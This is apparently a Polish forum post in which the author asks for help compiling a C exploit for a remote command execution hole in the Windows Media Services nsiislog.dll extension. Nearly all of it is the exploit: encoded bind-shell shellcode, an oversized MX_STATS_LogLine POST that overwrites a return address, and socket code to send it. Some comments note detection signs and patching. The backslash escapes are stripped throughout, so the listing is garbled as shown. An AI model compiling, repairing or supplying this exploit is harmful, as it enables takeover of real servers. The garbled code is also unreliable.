Żaden program nie skutkuje, to może ktoś mi pomoże skompilować następującego exploita:
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// © firew0rker //tN [The N0b0D1eS]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif
// Payload blob. main() copies sizeof(shellcode)-1 bytes of it into the request
// body so that it ends exactly where the 4-byte value at default_EIP_pos begins.
// usage() states its effect: a shell bound to TCP port 34816, or a higher port
// if that one is busy. An unexpected listener in that range on a media server
// is therefore the host-side indicator to check for.
// NOTE(review): the bytes are opaque in this listing and look encoded, so do
// not expect readable strings in captured traffic, and do not treat the literal
// bytes as a stable signature - they can be replaced without changing the
// shape of the request. Match on the request shape instead (see main).
char shellcode[]=
//"x90x90x90x90x90x90x90xCC" // disabled line, presumably a debugging aid (original note is mis-encoded)
"xebx02xebx05xe8xf9xffxff"
"xffx5bx81xebx4dx43x22x11"
"x8bxc3x05x66x43x22x11x66"
"xb9x15x03x80x30xfbx40x67"
"xe2xf9x33xa3xf9xfbx72x66"
"x53x06x04x04x76x66x37x06"
"x04x04xa8x40xf6xbdxd9xea"
"xf8x66x53x06x04x04xa8x93"
"xfbxfbx04x04x13x91xfaxfb"
"xfbx43xcdxbdxd9xeaxf8x7e"
"x53x06x04x04xabx04x6ex37"
"x06x04x04xf0x3bxf4x7fxbe"
"xfaxfbxfbx76x66x3bx06x04"
"x04xa8x40xbaxbdxd9xeaxf8"
"x66x53x06x04x04xa8xabx13"
"xccxfaxfbxfbx76x7ex8fx05"
"x04x04xabx93xfaxfaxfbxfb"
"x04x6ex4bx06x04x04xc8x20"
"xa8xa8xa8x91xfdx91xfax91"
"xf9x04x6ex3bx06x04x04x72"
"x7exa7x05x04x04x9dx3cx7e"
"x9fx05x04x04xf9xfbx9dx3c"
"x7ex9dx05x04x04x73xfbx3c"
"x7ex93x05x04x04xfbxfbxfb"
"xfbx76x66x9fx05x04x04x91"
"xebxa8x04x4exa7x05x04x04"
"x04x6ex47x06x04x04xf0x3b"
"x8fxe8x76x6ex9cx05x04x04"
"x05xf9x7bxc1xfbxf4x7fx46"
"xfbxfbxfbx10x2fx91xfax04"
"x4exa7x05x04x04x04x6ex43"
"x06x04x04xf0x3bxf4x7ex5e"
"xfbxfbxfbx3cx7ex9bx05x04"
"x04xebxfbxfbxfbx76x7ex9b"
"x05x04x04xabx76x7ex9fx05"
"x04x04xabx04x4exa7x05x04"
"x04x04x6ex4fx06x04x04x72"
"x7exa3x05x04x04x07x76x46"
"xf3x05x04x04xc8x3bx42xbf"
"xfbxfbxfbx08x51x3cx7excf"
"x05x04x04xfbxfaxfbxfbx70"
"x7exa3x05x04x04x72x7exbf"
"x05x04x04x72x7exb3x05x04"
"x04x72x7exbbx05x04x04x3c"
"x7exf3x05x04x04xbfxfbxfb"
"xfbxc8x20x76x7ex03x06x04"
"x04xabx76x7exf3x05x04x04"
"xabxa8xa8x93xfbxfbxfbxf3"
"x91xfaxa8xa8x43x8cxbdxd9"
"xeaxf8x7ex53x06x04x04xab"
"xa8x04x6ex3fx06x04x04x04"
"x4exa3x05x04x04x04x6ex57"
"x06x04x04x12xa0x04x04x04"
"x04x6ex33x06x04x04x13x76"
"xfaxfbxfbx33xefxfbxfbxac"
"xadx13xfbxfbxfbxfbx7axd7"
"xdfxf9xbexd9xeax43x0exbe"
"xd9xeaxf8xffxdfx78x3fxff"
"xabx9fx9cx04xcdxfbxfbx72"
"x9ex03x13xfbxfbxfbxfbx7a"
"xd7xdfxd8xbexd9xeax43xac"
"xbexd9xeaxf8xffxdfx78x3f"
"xffx72xbex07x9fx9cx72xdd"
"xfbxfbx70x86xf3x9dx7axc4"
"xb6xa1x8exf4x70x0cxf8x8d"
"xc7x7axc5xabxbexfbxfbx8e"
"xf9x10xf3x7ax14xfbxfbxfa"
"xfbx10x19x72x86x0bx72x8e"
"x17x70x86xf7x42x6dxfbxfb"
"xfbxc9x3bx09x55x72x86x0f"
"x70x34xd0xb6xf7x70xadx83"
"xf8xaex0bx70xa1xdbxf8xa6"
"x0bxc8x3bx70xc0xf8x86x0b"
"x70x8exf7xaax08x5dx8exfe"
"x78x3fxffx10xf1xa2x78x38"
"xffxbbxc0xb9xe3x8ex1fxc0"
"xb9xe3x8exf9x10xb8x70x89"
"xdfxf8x8ex0bx2ax1bxf8x3d"
"xf4x4cxfbx70x81xe7x3ax1b"
"xf9xf8xbex0bxf8x3cx70xfb"
"xf8xbex0bx70xb6x0fx72xb6"
"xf7x70xa6xebx72xf8x78x96"
"xebxffx70x8ex17x7bxc2xfb"
"x8ex7cx9fx9cx74xfdxfbxfb"
"x78x3fxffxa5xa4x32x39xf7"
"xfbx70x86x0bx12x99x04x04"
"x04x33xfbxfbxfbx70xbexeb"
"x7ax53x67xfbxfbxfbxfbxfb"
"xfaxfbx43xfbxfbxfbxfbx32"
"x38xb7x94x9ax9fxb7x92x99"
"x89x9ax89x82xbaxfbxbex83"
"x92x8fxabx89x94x98x9ex88"
"x88xfbxb8x89x9ex9ax8fx9e"
"xabx89x94x98x9ex88x88xba"
"xfbxfbxacxa8xc9xa4xc8xc9"
"xd5xbfxb7xb7xfbxacxa8xba"
"xa8x94x98x90x9ex8fxbaxfb"
"x99x92x95x9fxfbx97x92x88"
"x8fx9ex95xfbx9ax98x98x9e"
"x8bx8fxfbxacxa8xbaxa8x8f"
"x9ax89x8fx8ex8bxfbx98x97"
"x94x88x9ex88x94x98x90x9e"
"x8fxfbxfbx98x96x9fxfbxe9"
"xc4xfcxffxffx74xf9x75xf7";
// Layout constants and buffers for the request body built in main().
// Taken together they describe a body of roughly 10 KB for a single log-line
// field, far beyond any legitimate value. That size is the property a request
// filter or log review can key on.
const DWORD default_EIP_pos = 9992; // byte offset in sploit[] where main() writes default_EIP_value
const DWORD default_EBX_points_to = 9988; // placement offset for the payload copy: main() makes the payload end at this offset + 4
//const DWORD default_EIP_value = 0x77F8441B; // disabled alternative; the original note is mis-encoded, it mentions JMP EDX and ntdll.dll
// 4-byte value stored at default_EIP_pos.
// NOTE(review): presumably an address that is only meaningful on the single
// target build listed in usage() - confirm before relying on that reading.
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; // disabled; original note is mis-encoded
// Default request path; the -r option in main() replaces it.
char *nsiislog_default = "/scripts/nsiislog.dll";
// Request body: filler up to default_EIP_pos, the 4-byte value, room for the payload, one terminator byte.
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
// Holds the complete HTTP request that main() formats with sprintf(); sized at twice the body.
char sploitbuf[sizeof(sploit)*2];
// Prints the banner and command-line help, substituting argv[0] for the program
// name, then terminates the process with exit status 0. main() calls it when no
// target is given and when an unknown option is seen.
//
// The help text is the only place the listing states what the payload does:
// it binds a shell to TCP port 34816, or a higher port if that one is busy.
// It also names a single supported target: Windows 2000 [5.00.2195] server,
// Russian build, with nsiislog.dll version 4.1.0.3917. Hosts running that
// extension are the ones to inventory and patch first.
void usage(char* argv[])
{
printf("Dicklamer
"
"We are not responsible for the illegal use of this software.n"
"Description: Binds shell to port 34816 (or higher if port busy).n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]n"
"Supported target(s):n"
"Windows versionttttnsiislog.dll versionn"
"------------------------------------------------------------n"
"2000 [5.00.2195] server rus.tt4.1.0.3917n", argv[0]);
exit(0);
}
// Entry point: reads the target from argv[1], builds one oversized HTTP POST
// aimed at the nsiislog.dll logging extension, and sends it over a TCP socket.
// The switch below handles -p/-P (port, default 80) and -r/-R (request path,
// default nsiislog_default). Returns 0 after the send path completes; the catch
// handlers return -1 or the caught int.
//
// Request shape as built by the sprintf() call below, for log review and
// filtering:
//   - POST to /scripts/nsiislog.dll, or to the path given with -r
//   - HTTP/1.0, User-Agent NSPlayer/4.1.0.3917, Content-Type text/plain
//   - one fixed Pragma xClientGUID value
//   - a body that begins with the MX_STATS_LogLine field name and runs to
//     roughly 10 KB
// The header values are easy to change, so the oversized field is the durable
// signal. Mitigation is server-side: apply the vendor fix for nsiislog.dll, and
// remove or unmap the extension where media logging is not required.
int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;
if (argc<2) usage(argv);
nArgIndex = 1;
// Consume leading dash-prefixed arguments; an unrecognised one prints usage and exits.
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}
try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;
// Turn argv[1] into an IPv4 address.
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {// not an address literal: look it up as a host name
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {// argv[1] parsed as an IP address
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};
addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);
// Body layout: field name, 0xCC filler up to default_EIP_pos, payload laid over
// the end of the filler, then default_EIP_value, then a terminator.
char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/* without the trailing NUL */);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/* without the trailing NUL */);
// Store the 4-byte value at default_EIP_pos.
// NOTE(review): the original comment on this line is mis-encoded; it mentions
// EIP, EBX, a DWORD and JZ/JNZ, and its exact meaning cannot be recovered here.
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;
if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");
sprintf(sploitbuf,
"POST %s HTTP/1.0rn"
"Accept: */*rn"
"User-Agent: NSPlayer/4.1.0.3917rn"
"Content-Type: text/plainrn"
"Content-Length: %irn"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}rn"
"rn%srn",
nsiislog,strlen(sploit),sploit);
// The success message only reflects that send() accepted every byte. No
// response is read, so it says nothing about the state of the server.
int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{
printf("%sn",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %in",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}